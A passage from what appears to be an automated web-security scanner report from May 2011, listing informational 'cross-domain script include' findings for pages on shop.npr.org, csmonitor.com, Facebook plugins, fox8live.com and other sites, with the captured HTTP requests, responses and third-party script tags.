Set-Cookie: C2=kpAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NXAcLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: ROLL=boAnr2C+ORAgA1G9JNnz8yH!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: 46632794=_4dc80a64,1210252042,786652^981604^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 15:38:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0000981604/cstr=46632794=_4dc80a64,1210252042,786652^981604^1183^0,1_/xsxdata=$xsxdata/bnum=46632794/optn=64?trg="><\/script>
...[SNIP]...

18.17. http://shop.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/story/story.php?storyId=136128917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:49 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=3asomka8201jdf038aopdaio11; expires=Tue, 10-May-2011 01:39:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25071

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<img src="http://ems.alm75.com/images/ssl.gif" height="95" width="189" /> -->
<script type="text/javascript" src="https://seal.thawte.com/getthawteseal?host_name=shop.npr.org&amp;size=M&amp;lang=en"></script>
...[SNIP]...

18.18. http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /spoken-word/npr-american-chronicles-the-civil-war/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spoken-word/npr-american-chronicles-the-civil-war/ HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.1.10.1304955581; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:21 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32761

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<img src="http://ems.alm75.com/images/ssl.gif" height="95" width="189" /> -->
<script type="text/javascript" src="https://seal.thawte.com/getthawteseal?host_name=shop.npr.org&amp;size=M&amp;lang=en"></script>
...[SNIP]...

18.19. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_ent.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_ent.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_ent.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: xrd5EU4/EYn6CTm0B/vP2iQIA6dBwpgKjKWeRZC+oEEGYG0YFoO6lB+X8Z/+HPFU
x-amz-request-id: AF2245DF46085C33
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:12 GMT
ETag: "e37d02b72a512e6197bb14989afa39e4"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3912
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.20. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_lif.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_lif.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_lif.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: mEOu32vR3E8tGAEaHsutA96sOnZ22m8JXDTAo9TgtZ+QfkETrm1I3n8NvgsmlsX5
x-amz-request-id: B6265CA3FA21C90F
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:13 GMT
ETag: "2d3fcc84fd4ca454bafe287c3f3d378b"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3911
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.21. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_spt.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_spt.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_spt.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: jWviZDOs0B4w7K/QrBoQmmdDSBNN6gaRL6P6fjh5xQNFERkJvxXtOVd42p+LcQhk
x-amz-request-id: 02B557D041C2B130
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:15 GMT
ETag: "55a56750cbd83fb936648ff65382db00"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3912
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.22. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_wld.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_wld.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_wld.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: gh+tubFkRxyuKRBuISKEJt/yHAG0agTrpksbN82KyOaIvE0wxm8hOrhWbdH91ktL
x-amz-request-id: DA67803AA0B0C91B
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:18 GMT
ETag: "7406d66633c62f50d2de6d0cfb16c4a3"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3911
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.23. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/partnerMarketsIntradaySnap.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1EE0F56D53B8C87B4B0244807F4A5FA6

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8641

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 strict//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<HTML>
<HEAD>
   

<link href="http://cdn.macroaxis.netdna-cdn.com/skins/minimum.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://cdn.macroaxis.netdna-cdn.com/scripts/minimum.js"></script>
...[SNIP]...

18.24. http://www.csmonitor.com/Business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Business HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=19
Expires: Mon, 09 May 2011 15:35:12 GMT
Date: Mon, 09 May 2011 15:34:53 GMT
Connection: close
Content-Length: 83875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


        <title> B
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-70a4ef81fd680189295c07709c488bca-637330399c4b4cfb742d6605953b851d">
               <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
                       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...
</script>    <script src="http://cdn.media6degrees.com/static/cs6169.js" type="text/javascript"></script>
...[SNIP]...

18.25. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=73
Expires: Mon, 09 May 2011 15:39:13 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close
Content-Length: 74098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


    <title> Ga
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-fafd3a41deed04064c02b92b8a53809f-dd7b0974c0bc3b7de373673bea2560f5">
               <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
                       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...
</script>    <script src="http://cdn.media6degrees.com/static/cs6169.js" type="text/javascript"></script>
...[SNIP]...

18.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

18.27. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

18.28. http://www.fox8live.com/business/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:53 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:53 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 28256
Connection: keep-alive
Content-Length: 28256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://idm.img.entriq.net/dayportcore/dpm/DayPortPlayers.js?v=20070107" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.29. http://www.fox8live.com/business/iframe_financialticker.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_financialticker.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/iframe_financialticker.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:02 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:39:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5216
Connection: keep-alive
Content-Length: 5216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

